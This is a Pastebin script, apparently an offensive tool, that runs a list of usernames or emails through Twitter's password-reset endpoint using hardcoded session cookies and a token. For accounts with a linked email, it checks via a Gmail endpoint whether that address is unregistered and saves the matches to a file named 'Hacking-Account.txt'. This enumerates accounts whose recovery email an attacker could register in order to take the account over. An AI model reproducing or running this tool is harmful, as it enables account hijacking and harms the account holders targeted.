Advertisement
6g7r

Twitter Availability email Checker

May 17th, 2021
1,029
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.39 KB | None | 0 0
  1. import requests
  2. import time
  3. from time import sleep
  4. print("""
  5.  
  6. ─────▄██▀▀▀▀▀▀▀▀▀▀▀▀▀██▄─────
  7. ────███───────────────███────
  8. ───███─────────────────███───
  9. ──███───▄▀▀▄─────▄▀▀▄───███──
  10. ─████─▄▀────▀▄─▄▀────▀▄─████─
  11. ─████──▄████─────████▄──█████
  12. █████─██▓▓▓██───██▓▓▓██─█████
  13. █████─██▓█▓██───██▓█▓██─█████
  14. █████─██▓▓▓█▀─▄─▀█▓▓▓██─█████
  15. ████▀──▀▀▀▀▀─▄█▄─▀▀▀▀▀──▀████
  16. ███─▄▀▀▀▄────███────▄▀▀▀▄─███
  17. ███──▄▀▄─█──█████──█─▄▀▄──███
  18. ███─█──█─█──█████──█─█──█─███
  19. ███─█─▀──█─▄█████▄─█──▀─█─███
  20. ███▄─▀▀▀▀──█─▀█▀─█──▀▀▀▀─▄███
  21. ████─────────────────────████
  22. ─███───▀█████████████▀───████
  23. ─███───────█─────█───────████
  24. ─████─────█───────█─────█████
  25. ───███▄──█────█────█──▄█████─
  26. ─────▀█████▄▄███▄▄█████▀─────
  27. ──────────█▄─────▄█──────────
  28. ──────────▄█─────█▄──────────
  29. ───────▄████─────████▄───────
  30. ─────▄███████───███████▄─────
  31. ───▄█████████████████████▄───
  32. ─▄███▀───███████████───▀███▄─
  33. ███▀─────███████████─────▀███
  34. ▌▌▌▌▒▒───███████████───▒▒▐▐▐▐
  35. ─────▒▒──███████████──▒▒─────
  36. ──────▒▒─███████████─▒▒──────
  37. ───────▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒───────
  38. ─────────████░░█████─────────
  39. ────────█████░░██████────────
  40. ──────███████░░███████───────
  41. ─────█████──█░░█──█████──────
  42. ─────█████──████──█████──────
  43. ──────████──████──████───────
  44. ──────████──████──████───────
  45. ──────████───██───████───────
  46. ──────████───██───████───────
  47. ──────████──████──████───────
  48. ─██────██───████───██─────██─
  49. ─██───████──████──████────██─
  50. ─███████████████████████████─
  51. ─██─────────████──────────██─
  52. ─██─────────████──────────██─
  53. ────────────████─────────────
  54. ─────────────██──────────────
  55. insta : @6g7r_here
  56.  
  57. """)
  58. f = input('file : ')
  59. file = open(f).read().splitlines()
  60. for file in file:
  61. url = 'https://twitter.com/account/begin_password_reset'
  62. hed ={
  63. "Accept":'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
  64. 'Accept-Encoding':'gzip, deflate, br',
  65. 'Accept-Language':'ar,en-US;q=0.7,en;q=0.3',
  66. 'Connection':'keep-alive',
  67. 'Content-Length':'83',
  68. 'Content-Type':'application/x-www-form-urlencoded',
  69. 'Cookie':'personalization_id="v1_+Z7t5zMxsPz4xJILoOkNUw=="; guest_id=v1%3A161894893576736655; _ga=GA1.2.561082359.1618948944; _twitter_sess=BAh7CiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCMeaSHR5AToMY3NyZl9p%250AZCIlNjFjZGMxMDNiZGVlYzg1Yzk2OWNhNzI4OGI5NWZhODM6B2lkIiVkZjZi%250AMDRkYWU0MzliYWM2YTUwMmEwNzIwZDExN2Q5NiIJcHJycCIA--753b5aa1b5cff474a35599a4f675de4f7688b4f9; att=1-a3yoMTQnwAH8qE9bGwGjJAxwSDV86gW5lVQ1YvaC',
  70. 'Host':'twitter.com',
  71. 'Origin':'https://twitter.com',
  72. 'Referer':'https://twitter.com/account/begin_password_reset',
  73. 'TE':'Trailers',
  74. 'Upgrade-Insecure-Requests':'1',
  75. 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0'
  76. }
  77. data = {
  78. 'authenticity_token':"658b697510ca96d547d00f9eb27c1d594b6250c1",
  79. 'account_identifier':file
  80. }
  81. req = requests.post(url,headers=hed,data=data).text
  82. sleep(3)
  83. if('value="email')in req:
  84. print('Good Account',file)
  85. url = f'https://mail.google.com/mail/gxlu?email={file}'
  86. sleep(1)
  87. req = requests.get(url)
  88. sleep(0.5)
  89. try:
  90. if req.headers['Set-Cookie'] != '':
  91. # 𝑖𝑛𝑠𝑡𝑎 : @6𝑔7𝑟_ℎ𝑒𝑟𝑒
  92. print('Not available', file)
  93.  
  94. except KeyError:
  95. print('Available Gmail', file)
  96. open('Hacking-Account.txt', 'w').write(f'{file}\n')
  97. if('autofocus autocorrect="off"')in req:
  98. print('Bad Account',file)
  99. else:
  100. print('The tool was blocked')
  101.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement